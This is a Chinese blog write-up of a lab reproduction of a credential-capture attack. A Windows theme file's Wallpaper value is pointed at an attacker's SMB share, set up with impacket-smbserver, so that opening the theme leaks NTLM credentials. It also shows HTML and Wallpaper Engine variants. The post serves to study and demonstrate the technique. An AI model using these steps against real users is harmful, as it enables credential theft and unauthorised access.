初探基于windows主题的哈希传递攻击


近期看到嘶吼发的一篇文章



很感兴趣,于是决定试一试。根据文章中所说的信息进行了复现,记录一下复现过程。


复现过程

攻击机:kali 192.168.233.128

靶机:win server 2012 192.168.233.130

            win10 192.168.233.1


首先制作恶意主题包

右击桌面,选择到主题,选择已应用的主题,右击导出主题文件

.



导出文件为deskthemepack后缀。使用压缩文件打开该文件获得theme文件




用文本编辑器打开theme文件,来到[Control Panel\Desktop]块下面,找到Wallpaper参数。利用地点就在这里。这里规定了壁纸的引用地址,可以是本地文件也可以是一个网络地址。而网络地址又支持多种协议。所以就功能来讲确实不算是漏洞,微软拒绝修复也很正常。

我们将Wallpaper的值设置为一个SMB共享文件 192.168.233.128\a\shell.png   (攻击者开启的smb服务)




然后保存。进入kali开启smb服务。我们可以使用impacket进行快速搭建服务。impacket具体用法请自行百度

impacket-smbserver a `pwd`

如果失败记得加上sudo




开启成功后模拟被害者操作

双击theme文件安装主题,这个时候kali里面就会收到用户的凭据信息


注意:SMB服务器一定要在正常运行,不然靶机会桌面无响应。

这就是整个攻击流程。其实最本质的思想就是在一些无需授权的功能处访问无密码smb资源时会默认传递系统自己的凭据信息。将这个思路扩大还有其他玩法。比如近些年火热的动态壁纸软件wallpaper engine也有一个外部资源访问的功能




这个也可以利用



还有什么呢?其实html也可以。正好在win server 中没有主题这个玩意,于是便可以利用html进行攻击




访问恶意html文件




smb服务器同样收到了凭据信息






至此两台靶机全都攻击成功。

最后想一想其实可以攻击的手段还有很多,只要是远程资源,自动访问,都可以进行这个攻击。但是在实验时发现了问题,445端口在网络运营商那一层就被屏蔽掉了,据说是为了防御永恒之蓝。win系统又不支持非标准smb访问,所以这个手法在国内大概只能用于内网了吧。国外环境因为复现麻烦就没再尝试。


END

声明:阿硕的博客|松鼠A的博客|版权所有,违者必究|如未注明,均为原创|本网站采用BY-NC-SA协议进行授权

转载:转载请注明原文链接 - 初探基于windows主题的哈希传递攻击


未来一定会更好